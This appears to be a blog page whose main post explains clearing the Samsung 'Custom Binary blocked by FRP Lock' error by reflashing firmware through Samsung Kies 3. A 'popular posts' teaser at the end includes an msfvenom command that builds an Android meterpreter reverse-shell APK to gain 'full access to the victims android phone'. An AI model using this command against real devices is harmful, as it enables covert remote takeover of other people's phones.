Skip to main content

[Fixed]Custom Binary blocked by FRP Lock

If you android phone's not turning on and displaying the error message "Custom Binary blocked by FRP Lock", don't panic, the solution is right in this article.
Note: This was tested on Samsung J7 and worked perfectly fine.

You'll need:

  • Samsung Kies 3
  • Click here to download it


  • After download Samsung Kies 3, Install it

  • Open It
  • Click on Tools and choose Firmware Upgrade and Initialisation

  • Enter Details
  • Just type in the Model Name of the phone and press Enter. Now type in the Serial Number.

    You can get Model Name and Serial Number by removing battery, It should be written on the phone behind the battery. 

    After entering the required details, just click Ok. You may be prompted some warnings. Just Click Ok.

    You should now be seeing a window like this but with your appropriate details:

    To be able to Start the Upgrade, you'll need to go into Download Mode in your Android Device.

  • Go into Download Mode
  • Press Volume Down, Power Button and Home Button together, until you see a Warning Sign. You're now in Download Mode. Now press Volume Up to continue.

  • Connect your phone to Laptop/PC via USB cable and Click on Start Upgrade on Samsung Kies 3.

  • You're Done!!
    You just need to wait.

    Note: This process might take some time to complete, so you'll need to be patient.

    Popular posts from this blog

    How to install the FReMP Stack on Ubuntu 20.04?

    Technology keeps on evolving everyday and developers constantly look for more and more things to get their hands-on. In this article, I will be introducing a new full stack framework, called FReMP . The abbreviation used is not the best one, but it just gets the work done in justifiable ways. What on earth is FReMP stack? The FReMP stack is a highly scalable full stack framework, which can be used to build awesome web apps. The acronym stands for F lask, Re actJS, M ongodb and P ython. Unlike other famous stacks such as MEAN and MERN, the FReMP stack uses Python to handle back-end operations. Examples of such operations can be machine learning and artificial intelligence operations, web scraping tools or digital image processing. Step 0: Update your list of installed packages While this is optional, it is always a good practice to update your list of packages and upgrade them for newer versions before starting any installation on your environment. Run the following to do so: $ apt-get

    [Python]Publish your python project to PyPI

    The Python Package Index, also known as PyPI, is a large repository of python packages. Millions of developers all around the world contribute to Python daily by creating python scripts and uploading to PyPI. In this blog post, I am going to write a simple python script that, on running, will print Hello World on the terminal. Then, going to upload this script to PyPI so that it can be installed on any platform easily using pip or pip3 . Requirements: 1. Github account 2. Basic knowledge of python 3. setuptools - (pip3 install setuptools) 4. wheel - (pip3 install wheel) By the end of this blog post, you should be able to print hello world using a single command: Let's get started! The first thing to do is find a unique name for your project. The name that I will call the Hello World script will be print_hello_world . At the time that I am writing this post, there is not package called print_hello_world  on  PyPI . Logically, after doing this tutorial, there might

    [Android + msf]How to use Metasploit Framework on an Android Device?

    Metasploit Framework(msf) Requirements: Linux-based OS You'll need to have msfconsole installed on your machine You'll need to have msfvenom correctly installed on the machine. This will be used to generate the backdoor.  Install apktool as well. Note: This tutorial is meant for educational purposes only. Please don't misguide the purpose of this tutorial, you'll be responsible for any act of Hacking or theft. Steps 1) First of all open up your terminal. (Ctrl + Alt + T) $ sudo apt-get update Update your repositories before starting. 2) Once updated, we can start. Simply follow the steps below to get started: $ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST='' LPORT='xxxx' R > testfile.apk Replace "testfile" with any name you want. This will be the Main Activity, which when tapped on your android device will activate meterpreter on your terminal and let you gain full access to the victims android phone.